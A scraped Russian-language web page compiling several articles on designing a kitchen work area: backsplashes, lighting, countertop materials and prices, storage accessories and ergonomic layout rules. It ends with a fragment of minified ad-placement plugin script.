1 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Интерьер кухни рабочая зона

Ваш гид по дизайну интерьера

Кухня — самое главное место во всем доме. Ведь оттого насколько удобно и красиво она оборудована зависит атмосфера и комфорт пребывания в помещении. Казалось бы, ну что может быть сложного в расстановке гарнитуров, шкафов и кухонных принадлежностей?

Однако умение правильно организовать столовое пространство позволяет максимально оптимизировать весь процесс готовки. К тому же функциональная и стильная кухня — это всегда отличное настроение и стимул для творчества.

Как известно, одной из самых важных частей кухонного пространства является рабочая зона. Поэтому именно она должна обустраиваться наиболее эргономичным и эстетичным образом — так, чтобы все элементы интерьера выполняли не только декоративную, но и практичную функцию.

В этом смысле следует отметить несколько деталей кухонной обстановки, требующих особого внимания при своем оформлении. Речь идет об оборудовании фартука, дизайне столешницы, организации освещения и применении различных кухонных аксессуаров.

Фартук — варианты отделки

Главным украшением кухни и ее значимым элементом является так называемый фартук. Это рабочее пространство между навесными полками и поверхностью стола, мойкой, плитой. Такая зона чаще всего в процессе приготовления пищи подвергается неблагоприятным внешним воздействиям. Поэтому для оборудования фартука необходимо использовать только практичные и надежные материалы.

Сегодня широкий выбор отделочных материалов позволяет создавать самые разнообразные стилистические решения фартука, гармонично сочетая его с общим дизайном помещения. Однако каким бы ярким и необычным ни был кухонный фартук, он обязательно должен сохранять свою эргономичность.

Основные свойства рабочей зоны:

  • быть простым в уходе;
  • иметь привлекательный и эстетичный вид;
  • обладать устойчивостью к внешним загрязнениям и чистящим средствам.

Оформить фартук можно любым невероятным способом. К примеру, он может быть самым контрастным пятном интерьера, перетягивая таким образом на себя все внимание, а может состоять из спокойных нейтральных тонов и служить базовым фоном отделки. Но какой бы вариант ни использовался, главное, чтобы хозяин кухни чувствовал себя в ней максимально комфортно и естественно. Следует помнить, что в интерьере кухонного помещения ничего не должно раздражать или диссонировать с потребностями и пожеланиями его обладателя.

Самым распространенными и востребованными вариантами отделки для фартука сегодня являются:

Каждый из видов этой отделки обладает своими особым набором качеств и используется исходя из общей стилистической тенденции дизайна интерьера, предоставляя неограниченный простор для проявления творческого креатива и фантазии.

Освещение рабочей зоны на кухне

Свет на кухне — один из главных, если не сказать решающих, факторов функциональности рабочего пространства и эстетичности его декоративного оформления. Ведь оттого насколько правильно подобрано и расположено осветительное оборудование зависит визуальное преображение помещения. К счастью, сегодня рынок светоприборов пестрит многообразием различных видов и конфигураций светильников и люстр, что позволяет максимально точно подобрать требуемый вариант.

Следует заметить, что на оформление и практичность рабочей зоны во многом будет влиять также правильность размещения, и сочетания основного, секторного и декоративного освещения. Этот момент интерьерного оформления кухни требует наиболее тщательной проработки. Например, непосредственно над производственной поверхностью всегда используется самое мощное свечение, а вот для общего освещения вполне допустим теплый, мягкий свет в 75 Вт на метр квадратный.

Итак, какой же осветительный прибор лучше всего подойдет для кухни? Вариантов несколько:

  1. галогенные светильники — экономичны, обладают холодным синеватым светом и могут искажать цвет продуктов;
  2. люминесцентные лампы — экономные, с высокой светоотдачей, идеальны для подсветки рабочей зоны;
  3. обычная лампочка — недорогой и привычный всем вариант, но не самый экономный;
  4. светодиодные ленты − декоративные, имеющие низкую функциональность.

Однако подбор определенного вида освещения всегда необходимо осуществлять в строгом соответствии с санитарными нормами, предполагаемым зонированием кухни и стилистической концепцией интерьера.

Столешница и рабочая поверхность

Стол для кухни — такой же важный элемент, как и крыша для дома. Именно на его поверхности производится весь рабочий процесс приготовления еды. Поэтому на первом месте в вопросе оформления столешницы находится ее практичность и удобство.

Важно. Рабочая поверхность должна быть изготовлена из прочных, износостойких, устойчивых к влаге, механическим повреждениям и очищающим средствам материалов. Зачастую это натуральное природное сырье — дерево, мрамор, гранит, камень, ламинированный ДСП и керамика. Реже всего применяется стекло.

Несомненно, с таким богатством выбора материалов и цветовой палитры кухонных столешниц, воплотить в жизнь любую, даже самую смелую и эксцентричную, идею по оформлению рабочей зоны достаточно легко. Однако, не следует забывать о сохранении столом своих основных функций. Умение гармонично сочетать красоту, практичность и оригинальность в оформлении топа кухни — поистине настоящее искусство.

Современные же столешницы — это мультиуниверсальные приспособления, объединяющие в себе систему хранения различной кухонной утвари и разделочную поверхность. Каким образом обыграть и украсить стол зависит только от личных вкусовых предпочтений хозяина дома.

Как показывает практика, чаще всего столешницы оформляются в классическом стиле с использованием одной цветовой гаммы оттенков топа и интерьера. Но не стоит бояться экспериментировать с узорами, орнаментами, яркими цветами и фотопечатью. Необычный подход в дизайне кухонного стола лишь подчеркнет вашу индивидуальность и гарантирует позитвный настрой на весь день.

Аксессуары

Нерациональное использование и нагромождение рабочего инвентаря всегда являлась большой проблемой для кухни. Современные же технологии позволили полностью решить вопрос «захламленности» и оптимизации пространства помещения путем использования различных удобных и компактных специализированных кухонных приспособлений.

Среди подобного оборудования:

  1. рейлинги, позволяющие размещать кухонные предметы первой необходимости — полотенца, поварешки, прихватки, лопатки, сковородки, кастрюли и прочую утварь;
  2. подвесные открытые полочки для хранения посуды и различной дребедени;
  3. выдвижные полки и стеллажи;
  4. встроенные шкафы;
  5. прозрачные стенки ящиков для лучшего поиска нужных предметов;
  6. эргономичные системы и поворотные механизмы фурнитурных элементов.

Таким образом, для того чтобы кухня стала уютней, вместительней и просторней, достаточно грамотно организовать и оборудовать ее рабочее пространство, не забывая при этом об основных рекомендациях и правилах интерьерного оформления. Ведь красивая и удобная кухня — залог комфорта, удовольствия и неиссякаемой радости!

Умные гаджеты и необычные приспособления способны облегчить ваш труд на кухне.

Рабочая зона на кухне – идеи дизайна и оптимизация пространства

Рабочая зона на кухне – очень важное место для любой хозяйки, ведь именно здесь рождаются изысканные кулинарные шедевры для домочадцев и гостей. Это пространство должно быть обустроено с максимальным комфортом, чтобы все необходимое находилось под рукой и не приходилось совершать лишних маневров. Современные дизайнеры предлагают множество вариантов оформления рабочей зоны, благодаря которым можно сделать интерьер не только функциональным, но и стильным.

Оформление фартука

Фартуком называется часть стены между навесными шкафчиками и столешницей. Иногда подвесная рабочая стенка на кухне и вовсе отсутствует (так бывает в интерьере лофт, фото которого можно посмотреть на сайте), тогда фартуком является целая поверхность стены. Так как она находится в непосредственной близости от плиты и мойки, то постоянно подвергается загрязнению, попаданию жирных пятен, налету копоти. Поэтому для отделки фартука следует выбирать наиболее практичные материалы, которые имеют длительный срок эксплуатации. Из последних дизайнерских новинок для кухни можно выделить скинали. Это декоративная панель, изготовленная из закаленного стекла, устойчивого к перепадам температур и влажной среде. Особенно примечателен дизайн такой отделки: при помощи широкоформатной печати любое изображение наносится на обратную сторону сталинита и крепко фиксируется таким образом, чтобы туда не попадала влага. Рисунок может быть любым: от пейзажей до фруктов, да и размер можно выбрать любой. Кроме того, такая панель монолитная, а значит, в стыках не образуется грибок и ее намного проще мыть. Такая кухонная зона выглядит очень оригинально и стильно.

Отделка из плитки – наиболее распространенный и бюджетный вариант, встречающийся в большинстве квартир. Качественная керамика способна прослужить долгие годы и может вписаться в любой интерьер благодаря насыщенной цветовой гамме. Иногда используют и пластиковые панели, однако такой материал недолговечен и часто нуждается в замене, поскольку не выдерживает высокой температуры.

Материал столешницы

Качественная и красивая кухонная рабочая поверхность – залог успеха в дизайне любой кухни. Современные производители предлагают широкий ассортимент товаров на любой вкус и кошелек, однако стоит исходить из семейного бюджета. Мрамор и гранит – благородные и дорогие материалы, которые выдерживают любые нагрузки и служат вечно в качестве рабочей зоны. Однако мрамор имеет достаточно пористую поверхность и чувствителен к частым и резким перепадам температур. При неправильной эксплуатации он со временем может расколоться, поэтому нуждается в бережном отношении.

Искусственный камень акрил или агломерат производится на основе каменной крошки. Он не так износоустойчив как гранит, однако при правильном уходе срок эксплуатации может значительно увеличиться. Эффектно выглядит столешница из кварца. Поверхность прочная, на ней не образуются сколы даже при сильном ударе. Кроме того, она красиво переливается при солнечном свете. Ламинированная ДСП давно занимает лидирующие позиции благодаря относительно низкой стоимости и большому выбору расцветок. Самыми лучшими являются немецкие и итальянские товары, где толщина меламинового слоя составляет 0,8 мм, что обеспечивает хорошую влагостойкость и ударопрочность. Чистится такая поверхность даже самыми сильными химикатами, однако от пятен следует избавляться вовремя, пока они не впитались.

Размер и форма столешницы могут быть любыми в зависимости от общего дизайна интерьера и габаритов помещения. Главное, чтобы поверхность хорошо сочеталась с рабочей зоной в целом, соответствовала отделке стен и гарнитуру.

Освещение

Вопрос о том, как разделить кухню на две зоны, при этом не используя дополнительных предметов, решается просто – правильно установить освещение. В квартире-студии эта проблема вызывает затруднения, поскольку не хочется загромождать свободное пространство. Грамотно расставленные электрические приборы помогут не только отделить зону кухни от гостиной, но и сэкономят электроэнергию.

Рабочая поверхность на кухне должна иметь самое яркое освещение для удобства приготовления пищи в любое время суток. Желательно не использовать люминесцентные лампы, которые из-за голубого свечения искажают внешний вид продуктов и вызывают чувство тревоги. Достаточно будет обычной желтой лампы большой мощности, желательно энергосберегающего типа. Накладные светильники, расположенные непосредственно над столешницей в нижней части навесных полок, отлично осветят рабочую поверхность на кухне. Также можно установить споты, светильники с направленным светом, или поворотные модели с регулируемым углом наклона. Желательно, чтобы их размер был не очень большим, иначе хозяйке будет неудобно готовить.

Если в зоне кухни и гостиной есть разделение в виде острова со встроенной варочной поверхностью и мойкой, то будут уместны подвесные лампы в матовых или ротанговых абажурах. Хорошо, если они будут регулироваться по высоте. Крепление осуществляется при помощи кронштейнов непосредственно к потолку, а их дизайн может быть самым разнообразным: металлические цепи, хромированные элементы, деревянные детали. В навесную конструкцию над островом рекомендуется вмонтировать точечные светильники. Остров – это отличное решение для тех, кто не знает, как отделить кухонную зону от гостевой, не испортив интерьер. Иногда он является основной рабочей поверхностью без дополнительного гарнитура. В таком случае его следует приобретать в комплекте с навесной конструкцией, в которую можно вмонтировать вытяжку. Также она обеспечит хозяйку дополнительной зоной для хранения посуды и мелкой домашней утвари.

Эргономика

Какой бы ни был размер кухни, важно соблюдать «принцип треугольника», т.е. визуальное объединение плиты, мойки и холодильника, расстояние между которыми не должно превышать 1,5 метра. Это ускорит процесс приготовления пищи, к тому же все необходимое будет под рукой. Именно это основное правило эргономики сохраняется в Г-образной планировке мебели. Она предполагает размещение гарнитура вдоль двух перпендикулярных стен. Высота рабочей поверхности стола должна быть в пределах 85–90 см – это стандартный размер для мебели, а вот глубина может варьироваться от 40 до 60 и больше сантиметров. Для увеличения функциональности рекомендуется выбирать мебель с множеством дополнительных отсеков, шкафчиков, полочек, разделителей для кухонной утвари и для хранения продуктов. Также в зоне фартука будут уместны рейлинги с крючками.

Очень эффектно выглядят кухни с окном в рабочей зоне. На месте бывшего подоконника делают столешницу, которая заменяет рабочую поверхность или служит местом для перекуса. Если она модифицируется в барную стойку, будет целесообразно убрать нижнюю полку, чтобы освободить место для ног для комфортного сидения. Вместо барных стульев лучше приобрести табуреты, которые легко задвигаются под столешницу и не занимают много места. Гарнитур может располагаться по бокам в виде буквы П. Такая кухня с рабочей зоной у окна должна быть квадратной формы, поскольку в продолговатом помещении проход будет достаточно узким. Расстояние между боковинами гарнитура должно быть не менее 1–1,2 метра. У окна на кухне также можно поставить мойку – тогда появится возможность любоваться видом из окна, не отрываясь от работы.

Обстановка рабочей зоны очень важна для любой хозяйки. При выборе планировки и разработке дизайна следует опираться на функциональность и практичность, чтобы создать максимально благоприятные условия для приготовления пищи.

Фото: варианты оформления рабочей зоны







Видео: как правильно выбрать светодиодную подсветку для рабочей зоны.

Как лучше оформить рабочую зону на кухне

Ни для кого не станет новостью, что кухня без рабочего места не может существовать и абсолютно не важно, как она оформлена.

Рабочая зона на кухне

Рабочая зона кухни – это территория, где идет приготовление пищи, и создаются гастрономические изыски.

Как правило, в рабочей площади устанавливают необходимую технику и кухонный гарнитур, чтоб был порядок: вешают шкафы, устанавливают тумбы, газовые плитки, мойки и пр., все то, что должно быть под рукой у любой хозяйки.

В основном, «кухонный набор» достаточно небольшой, поэтому обыграть рабочую поверхность можно так:

  • изменить порядок расположения предметов мебели ли перенести рабочую поверхность в центр комнаты;
  • придать кухне оригинальности и эксклюзивности своими руками, используя разные декоративные элементы и предметы мебели.

Ну что ж, приступим?

Оформляем фартук

Самостоятельная отделка кухни

Кухонный фартук – это наиболее яркая зона, которую преображают современный стройматериалы и повышают ее надежность, функциональность и красоту. Чего только стоит декоративная конструкция, которая в области фартука выполняет не только декоративную функцию, но еще и защищает стены от огня, воды, жира и пр. Изготавливают ее из прочного огнеупорного стекла, которое справится и с повышенными температурами возле включенной плиты, и с механическими повреждениями. Также панель не боится влаги.

Еще одна особенность заключается в том, что на поверхность можно перенести какое-либо изображение. Благодаря современным технологиям, изображение наносится на обороте стекла, а торцы закрываются прочно, чтоб не проникала влага, и не портилось изображение.

Такие панели превосходят кафель, ведь это монолитная поверхность из целого куска стекла, которая не имеет швов. Ее идеальная поверхность также превосходит плитку по простоте мытья.

Панели из стекла могут достигать 3м в длину, а если вам нужно оформить большую площадь, потребуется совместить несколько плит и обработать все стыки герметиком.

Ниша, оформленная таким образом, смотрится весьма оригинально и эффектно, а если ее украсить светодиодами, изображение будто оживет на ваших глазах.

Так навязчиво мы подобрались к кухонному освещению.

Освещение

Освещение рабочей области имеет 2 функции:

  1. является и освещением, и декором;
  2. в темное время суток выполняет роль светильника, ведь такого освещения будет достаточно, чтоб выпить чашку чая.

Никто не поспорит, что люстра в центре кухни не справляется в достаточном объеме с задачей освещения, ведь ее мощности недостаточно, и рабочая поверхность попадает в тень.

Сегодня осветить кухню можно разными способами. Очень практичными считаются точечные светильники, которые монтируют на потолке по всему периметру рабочего пространства. Также можно установить гипсокартонный каркас, который будет смонтирован по периметру навесных тумбочек, и в него установить осветительные приборы.

Все большей популярности набирают споты, так званые светильники направленного света. Их можно устанавливать как на шкафах, так и под ними. Таким образом, освещенная ниша позволяет без труда готовить ужин, не включая при этом основное освещение. Если вам удастся приобрести поворотные светильники, они помогут осветить не только область для готовки блюд, но и всю площадь помещения.

Ну, куда же без светодиодов, ведь они предоставляют нам много возможностей. Сегодня стандартные белые светодиоды уходят на задний план, а им на смену пришли цветные. Такие лампочки могут излучать один цвет, либо переливаться и плавно переходить из одного цвета в другой.

Благодаря такой подсветке можно осветить:

  • фартук;
  • поверхность для готовки;
  • навесные тумбы;
  • цоколь;
  • всю площадь кухни (если установить ленту по всей площади комнаты).

Весьма оригинально смотрятся современные подвесные светильники, которые устанавливаются прям над столом или кухонным островком. Они не препятствуют свободному передвижению по кухне и в достаточном объеме освещают необходимое пространство.

Столешница в интерьере кухни

Рабочая зона на кухне своими руками

Стол – это незаменимый элемент, без которого невозможно обустроить рабочую площадь.

Если финансы ограничены и у вас нет возможности оформить столешницу из природных материалов или стекла, отлично подойдет просто яркий окрас этого незаменимого кухонного гарнитура.

Необычно выглядит столешница из темного материала, особенно если вся кухня выполнена в светлых, пастельных тонах. Например, столешница из черного материала неповторимо и изыскано смотрится в сочетании с гарнитуром цвета слоновой кости.

Также красиво и гармонично выглядит синяя столешница и черная кухонная мебель; фиолетовое рабочее полотно с белыми тумбами и пр. Не бойтесь экспериментов, сочетайте различные цвета, которые вам по вкусу.

Также большой популярностью пользуются столешницы необычных оттенков, которые имитируют дерево или каменную кладку.

Ну, безусловно, всегда популярны столешницы из мрамора, гранита, а также искусственного либо натурального камня. Эти материалы отличаются повышенным уровнем ударопрочности, им не страшны ни смены температур, ни повреждения – они даже возле плиты сохраняют презентабельный вид.

Самое новое достижение – столешница из закаленного стекла. Такая отделка сочетает в себе прочность и изысканность. Окрас столешницы можно сделать по вашему требованию, что позволит максимально гармонично влиться новой столешнице в старый кухонный гарнитур.

Установить столешницу можно в разном месте:

  • у глухой стенки;
  • изменить порядок между газовой плиткой и мойкой;
  • возле окна и пр.

Если вы хотите готовить блюда и любоваться видом из окна, установить столешницу в проеме будет не сложно. Для этого достаточно будет соблюсти такой порядок: снять подоконник, а в нишу установить рабочее полотно. Также, для удобства, туда можно будет и переместить мойку или плиту, изменив привычный порядок и расположение кухонной мебели. Так обыграть рабочее пространство можно не только на маленькой кухне, но и хозяевам домов за городом, которые не упустят шанс и преобразят территорию перед окном в розарий или небольшой сад.

Разновидности и стоимость наиболее популярных столешниц приведены в таблице.

Разновидности

Стоимость

ДСП и МДФ От 800 руб.
Панель, облицованная плиткой 800-900 руб.
Нержавеющая сталь От 2000 руб.
Искусственный камень От 8000 руб.
Натуральный камень От 10000 руб.

Как навести порядок в кухонной нише?

Рабочая зона на кухне

В нашей стране очень много квартир, в которых кухня очень маленькая, да еще и есть такое неудобство, как ниша в стене.

Ниша – это небольшое углубление в стене. Но, оформить такое неуместное пространство можно дальше с небольшой выгодой.

Если вы не хотите заморачиваться с выбором кухонного гарнитура – нишу можно просто зашить гипсокартонном.

Но, не спешите избавляться от такого «золотого» пространства, как ниша. Встречаются даже некоторые владельцы квартир, которым ниша на кухне очень нужна, и она готовы ее сделать самостоятельно.

Вот несколько идей, следуя которым ниша может оригинально преобразиться своими руками:

  • ниша может вместить в себя холодильник;
  • поставить тумбу (лишние полочки помогут навести порядок, например, в специях);
  • установить сушку для посуды;
  • перенести к углублению в стене газовую плиту и повесить над ней вытяжку;
  • установить органайзер для хранения рецептов, который быстро приведет все бумажки в порядок;
  • ниша может прекрасно разместить в себе аквариум и пр.

Как видите, несмотря на то, что рабочая зона присутствует на любой кухне, оформить ее можно абсолютно по-разному. Главное не бойтесь экспериментировать и подключите к этому процессу всю свою фантазию.

Эргономика кухни: Основные принципы и подводные камни

С чего начинается правильное планирование кухни и чем — заканчивается

Треугольник, с которого начинается планирование кухни
Говоря об эргономике кухни, в первую очередь мы вспоминаем правило «рабочего треугольника», которое гласит: расположение основных рабочих точек — холодильника (хранение), мойки (подготовка) и плиты (приготовление пищи) — должно укладываться в равносторонний треугольник со сторонами метр-полтора (два-три шага). Подразумевается, что человек во время приготовления пищи в таком треугольнике все время будет двигаться по кратчайшей траектории и в итоге сэкономит силы и время. Очарованные этим знанием хозяйки успокаиваются и перестают думать о деталях. А потом им становится неудобно готовить на собственной кухне.

Будь он параллелепипед…
Правило кухонного треугольника было выведено немцами сто лет назад, только вместо холодильника в нем фигурировал разделочный стол. Сегодня в наших маленьких квартирках эта зона располагается везде, где есть свободное место на столешнице. В больших помещениях есть возможность выделить полноценную рабочую зону и вместо треугольника сделать четырехугольник — например, при наличии острова.

В зависимости от конфигурации комнаты мы выбираем планировку кухни — линейную, угловую, П-образную, в две линии и с островом. Понятно, что в каждом случае эргономика нашей кухни будет разной: нет даже смысла сравнивать расстояния, рекомендованные для угла и параллели.

Место микроволновки
Жизнь меняется и меняются кухонные процессы. Все чаще микроволновка из зоны готовки смещается к холодильнику. Это логично: обычно мы в ней не готовим, а разогреваем готовую еду и размораживаем продукты. Удобное расположение микроволновой печи — на 10 см ниже плеча.

Недавний опрос пользователей Houzz показал, что при новом ремонте россияне стараются избавиться от полноразмерной плиты. А варочную поверхность и духовку, которые приходят ей на смену, устанавливают в разных частях кухни.

Духовка оторвалась от плиты
Идеально, если духовка расположена на уровне груди — видно, не пригорает ли пирог, и удобно доставать противень, не сгибаясь в три погибели. Логично определить духовку в зону приготовления пищи, в колонну рядом с варочной поверхностью. Если такой возможности нет, духовку можно встроить в колонну рядом с холодильником, в один ряд с микроволновкой. А сверху и снизу над техникой — ящики для хранения.

Маленький штрих к тому, как сделать удобной кухню: над духовкой или рядом с ней должен быть участок столешницы, куда можно поставить горячий противень. Часто мы забываем про этот нюанс, и с противнем приходится идти в другой конец кухни.

Стиральную машину тоже нередко устанавливают в кухне. Оптимальный вариант — расположить ее под столешницей у мойки, либо в колонне, например, под духовкой (розетки не должны быть закрыты).

Холодильник
Большинство хозяек достает продукты из холодильника заранее, поэтому его соседство во время готовки не так уж и важно — «треугольник» сводится к плите, мойке и рабочей зоне. Эргономичное положение для холодильника — у стены, при условии, что дверца открывается к стене. Либо у входа в кухню, чтобы можно было перекусить, не мешая приготовлению пищи.

Выбирая холодильник, подумайте о соотношении холодильной и морозильной частей. Оно бывает разным: 60:40, 70:30 и 50:50. Одним требуется вместительная морозилка, а другим она вообще не нужна.

Что на острове
Эргономика кухни с островом имеет свои нюансы. Главный вопрос — что вынести на остров: мойку, плиту, основную или дополнительную рабочую поверхность? Так, к плите на острове надо будет тянуть вытяжку или использовать выдвижную модель с угольным фильтром. А без кухонного фартука брызги с острова полетят во все стороны. Кроме того, если мойка не на одной столешнице с плитой, то на полу всегда будут капли. По той же причине неудобно выносить на остров и раковину (плюс надо будет решать проблему с водоотводом). А вот дополнительная рабочая поверхность, где можно раскатать тесто или разложить ингредиенты для сложного блюда, придется кстати.

Полноценные острова на кухне подойдут для помещений, размеры которых превышают 15 «квадратов» — это, скорее, статусный вариант, чем удобный.

Все стандарты плохи тем, что не учитывают габаритов помещения и данных владельцев — роста, длины рук и т.д. При заказе кухни можно скорректировать размеры под себя. Например, для узкой кухни есть смысл заказать столешницу глубиной 50 см и соответствующие шкафы. Сэкономленные 10 см визуально разгрузят помещение, и вам не придется тесниться. И наоборот, столешница в 70 см и шкафы глубиной 68 см позволят хранить кастрюли в два ряда, не теряя драгоценного места (на 58 см две крупные кастрюли просто не помещаются, а сковороды приходится размещать по диагонали).

Столешница
Один из ключевых параметров кухонной эргономики — высота столешницы. От нее зависит, будет человек работать с ровной спиной или в наклоне. Учтите это, планируя, как сделать кухню удобной и функциональной. Правильная высота рабочей зоны — 15 см от согнутого локтя. Это значит, что девушке ростом 165 см подойдет традиционный фабричный вариант — 85/90 см. А мужчине ростом 190 см удобно будет работать на столешнице высотой 1 м.

Совет: не игнорируйте подсветку рабочей зоны — она действительно влияет на удобство работы.

Зато если в нижней линии кухни сделать один выкатной шкаф, вы получите мобильную столешницу.

Варочной панели на две конфорки будет достаточно каждой второй семье, невзирая на ее размеры. Исключение — фанаты готовки. Кстати, если в семье есть дети, стоит купить индукционную панель, чтобы избежать ожогов. Кроме того, такая плита гладкая и быстро остывает, поэтому ее можно использовать как удобную сервировочную зону.

Если у вас газовая плита, не нужно располагать ее менее чем в 50 см от окна или балконной двери — иначе порыв ветра может потушить огонь. Также нельзя ставить плиту у окна с занавесками.

Шкафы
С точки зрения эргономики закрытые шкафы гораздо удобнее открытых. Да, они выглядят тяжелее, но экономят массу времени на уборку. Кухня есть кухня: и открытые полки, и все, что на них — придется регулярно очищать от липкого налета и пыли. Куда проще протереть фасад. Поэтому шкафы лучше сделать под потолок — еще и место сэкономите. Определите на верхний этаж посуду и технику, которые вы используете редко: казан для плова, фритюрницу, формы-елочки для новогоднего печенья и т.п. Пару раз в год забраться на стремянку — не проблема.

Открыть верхние шкафы поможет специальная фурнитура. Дверцы, поднимающиеся вверх, удобнее обычных распашных. Открытые системы хранения нужны только для вещей, которыми вы пользуетесь часто — чтобы не дотрагиваться жирными и мокрыми руками до ручек фасадов.

Нижнюю линию гарнитура лучше оборудовать выдвижными ящиками — они намного удобнее шкафов с распашными дверцами: сразу видно содержимое и не нужно опускаться на корточки, чтобы достать что-то из глубины. Если шкафы уже не заменить, можно использовать выдвижные корзины.

А вот демпферы, которые обеспечивают плавное закрывание дверей, спасут ваши уши от неприятного стука, а лоб — от синяков.

Розетки
Количество розеток и места их расположения также влияют на эргономику кухни. Техники становится больше год от года: пароварки, мультиварки, тостеры, блендеры, миксеры, хлебопечки, мясорубки, чайники, телевизоры… Проектируя розетки, лучше заложить «запас» в пару точек. Розетки должны быть разделены на группы и подключены к своим автоматам. К местам подключения техники нужно предусмотреть легкий доступ, поэтому не стоит располагать розетки за встроенной техникой. Правильный вариант — снизу или сбоку, за выдвижными ящиками. Так, чтобы можно было быстро отключить аппарат. Розетки, выскакивающие из столешницы или острова, выглядят эффектно, но стоят дорого и при том нередко ломаются.

Часть предметов привязана к вершинам кухонного треугольника. Так, под мойкой обычно расположены ведра для отходов, диспоузер, бытовая химия, над мойкой — сушильный шкаф, рядом — бумажные полотенца. Выдвижной ящик для столовых приборов оптимально располагать у мойки, как и сушилку для тарелок.

Рядом с плитой — кастрюли, крышки, половники, прихватки, специи. Рядом с рабочей зоной — ножи и разделочные доски. Нижние отделы — для тяжелых предметов. Удобная кухня предполагает, чтобы холодильник и шкафы с крупами и не скоропортящимися продуктами были собраны в одну зону хранения. Сумки из магазина разгружают в одном месте, и не надо бегать по кухне, рассовывая пакеты.

Эргономика кухни: правильное планирование и счастье
Обдумывая, как сделать кухню удобной и функциональной, важно не забывать про радость. Каждый, кто много времени проводит в кухне, имеет свое представление о функциональном помещении. Для одного это мойка с двумя чашами, для другого — наличие острова на кухне, для третьего — мойка у окна. Да, эти грезы зачастую противоречат рациональному подходу к планированию кухни, но дело того стоит. Когда человеку в кухне хорошо, не имеет значения, сколько сантиметров от плиты до мойки.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
